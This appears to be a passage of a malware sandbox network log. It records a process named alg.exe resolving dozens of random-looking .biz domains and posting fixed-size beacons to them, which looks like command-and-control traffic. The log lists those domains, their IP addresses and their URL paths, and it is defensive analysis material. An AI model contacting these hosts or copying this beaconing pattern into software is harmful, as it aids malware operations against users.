host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 555746
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F7A3FC4AE5394957B368671E7957CB17 Ref B: LON04EDGE0806 Ref C: 2024-05-19T19:10:38Z
date: Sun, 19 May 2024 19:10:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360313429_1X5GXWWD8KTODKAD6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360313429_1X5GXWWD8KTODKAD6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 442324
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B25684114BBE4484AD9BF14BD5FEEB88 Ref B: LON04EDGE0806 Ref C: 2024-05-19T19:10:38Z
date: Sun, 19 May 2024 19:10:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 415458
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FFE848BEA74E45B28D8EE2795144AF53 Ref B: LON04EDGE0806 Ref C: 2024-05-19T19:10:38Z
date: Sun, 19 May 2024 19:10:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360313430_12K7UVO7ZVIINTRIE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360313430_12K7UVO7ZVIINTRIE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 394521
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3F2C384085AF4CEBA9A536EC6978B8D3 Ref B: LON04EDGE0806 Ref C: 2024-05-19T19:10:39Z
date: Sun, 19 May 2024 19:10:38 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

tbjrpv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
DNS

tbjrpv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
POST

http://tbjrpv.biz/ssq

alg.exe

Remote address:

34.246.200.160:80

Request

POST /ssq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=903032b5ce132b5f493432f40947edf7|191.101.209.39|1716145877|1716145877|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

alg.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

54.80.154.23
POST

http://deoci.biz/ypnygbtaknx

alg.exe

Remote address:

54.80.154.23:80

Request

POST /ypnygbtaknx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=74aac2191ed5fea2eb2353885015766f|191.101.209.39|1716145877|1716145877|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gytujflc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
DNS

gytujflc.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
POST

http://gytujflc.biz/ordrqnmagx

alg.exe

Remote address:

208.100.26.245:80

Request

POST /ordrqnmagx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 19 May 2024 19:11:17 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/tdorc

alg.exe

Remote address:

208.100.26.245:80

Request

POST /tdorc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 19 May 2024 19:11:17 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/lvdnphx

alg.exe

Remote address:

208.100.26.245:80

Request

POST /lvdnphx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 19 May 2024 19:11:21 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/pepwujfjvcb

alg.exe

Remote address:

208.100.26.245:80

Request

POST /pepwujfjvcb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 19 May 2024 19:11:21 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
DNS

qaynky.biz

alg.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://qaynky.biz/hbwmxumxxebfx

alg.exe

Remote address:

13.251.16.150:80

Request

POST /hbwmxumxxebfx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=86972be5a02e69a80fb10329994385cd|191.101.209.39|1716145878|1716145878|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

160.200.246.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

160.200.246.34.in-addr.arpa

IN PTR

Response

160.200.246.34.in-addr.arpa

IN PTR

ec2-34-246-200-160 eu-west-1compute amazonawscom
DNS

23.154.80.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.154.80.54.in-addr.arpa

IN PTR

Response

23.154.80.54.in-addr.arpa

IN PTR

ec2-54-80-154-23 compute-1 amazonawscom
DNS

23.154.80.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.154.80.54.in-addr.arpa

IN PTR

Response

23.154.80.54.in-addr.arpa

IN PTR

ec2-54-80-154-23 compute-1 amazonawscom
DNS

245.26.100.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.26.100.208.in-addr.arpa

IN PTR

Response

245.26.100.208.in-addr.arpa

IN PTR

ip245 208-100-26staticsteadfastdnsnet
DNS

bumxkqgxu.biz

alg.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/ragioimcmpin

alg.exe

Remote address:

44.221.84.105:80

Request

POST /ragioimcmpin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cfcdb33782bbcf8aa712884601fb8018|191.101.209.39|1716145879|1716145879|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

35.91.124.102
DNS

dwrqljrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

35.91.124.102
POST

http://dwrqljrr.biz/wlxihhxl

alg.exe

Remote address:

35.91.124.102:80

Request

POST /wlxihhxl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=da5cb70327a9318cbb4089eba33fc2c7|191.101.209.39|1716145879|1716145879|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nqwjmb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
POST

http://nqwjmb.biz/hscb

alg.exe

Remote address:

35.164.78.200:80

Request

POST /hscb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=500746c24e7deab676a9c451c410adaf|191.101.209.39|1716145880|1716145880|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ytctnunms.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://ytctnunms.biz/y

alg.exe

Remote address:

3.94.10.34:80

Request

POST /y HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e5745244bfb9319b975b45189bc79304|191.101.209.39|1716145880|1716145880|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

alg.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.13.20

myups.biz

IN A

165.160.15.20
DNS

myups.biz

alg.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.13.20

myups.biz

IN A

165.160.15.20
POST

http://myups.biz/emgbecgegqbw

alg.exe

Remote address:

165.160.13.20:80

Request

POST /emgbecgegqbw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Date: Sun, 19 May 2024 19:11:20 GMT
Content-Length: 94
POST

http://myups.biz/wdauljojqxebqqv

alg.exe

Remote address:

165.160.13.20:80

Request

POST /wdauljojqxebqqv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Date: Sun, 19 May 2024 19:11:21 GMT
Content-Length: 94
DNS

oshhkdluh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

oshhkdluh.biz

IN A

35.91.124.102
POST

http://oshhkdluh.biz/kavcfc

alg.exe

Remote address:

35.91.124.102:80

Request

POST /kavcfc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fc34401253e038e509ca92e492647f48|191.101.209.39|1716145881|1716145881|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

200.78.164.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.78.164.35.in-addr.arpa

IN PTR

Response

200.78.164.35.in-addr.arpa

IN PTR

ec2-35-164-78-200 us-west-2compute amazonawscom
DNS

34.10.94.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.10.94.3.in-addr.arpa

IN PTR

Response

34.10.94.3.in-addr.arpa

IN PTR

ec2-3-94-10-34 compute-1 amazonawscom
DNS

34.10.94.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.10.94.3.in-addr.arpa

IN PTR

Response

34.10.94.3.in-addr.arpa

IN PTR

ec2-3-94-10-34 compute-1 amazonawscom
DNS

yunalwv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
DNS

jpskm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
POST

http://jpskm.biz/ciq

alg.exe

Remote address:

34.211.97.45:80

Request

POST /ciq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=32a3c4d1f1da35c6c44b09d9852f3406|191.101.209.39|1716145882|1716145882|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

20.13.160.165.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.13.160.165.in-addr.arpa

IN PTR

Response
DNS

lrxdmhrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

35.91.124.102
POST

http://lrxdmhrr.biz/exyd

alg.exe

Remote address:

35.91.124.102:80

Request

POST /exyd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=784a9c14d9f6de8d79e5d44b976b5a10|191.101.209.39|1716145882|1716145882|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wllvnzb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://wllvnzb.biz/fuavl

alg.exe

Remote address:

18.141.10.107:80

Request

POST /fuavl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bca2d5e24923dd09f42a23f8337725fa|191.101.209.39|1716145883|1716145883|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

45.97.211.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.97.211.34.in-addr.arpa

IN PTR

Response

45.97.211.34.in-addr.arpa

IN PTR

ec2-34-211-97-45 us-west-2compute amazonawscom
DNS

45.97.211.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.97.211.34.in-addr.arpa

IN PTR

Response

45.97.211.34.in-addr.arpa

IN PTR

ec2-34-211-97-45 us-west-2compute amazonawscom
DNS

gnqgo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

54.80.154.23
DNS

gnqgo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

54.80.154.23
POST

http://gnqgo.biz/ibspxmt

alg.exe

Remote address:

54.80.154.23:80

Request

POST /ibspxmt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e3f2d5c1c0896f172f4208a46676681b|191.101.209.39|1716145884|1716145884|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

3.237.86.197
POST

http://jhvzpcfg.biz/nu

alg.exe

Remote address:

3.237.86.197:80

Request

POST /nu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0fe3487679db01ec41790a412a3e9640|191.101.209.39|1716145884|1716145884|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
DNS

acwjcqqv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
POST

http://acwjcqqv.biz/agqbafxpnosw

alg.exe

Remote address:

18.141.10.107:80

Request

POST /agqbafxpnosw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
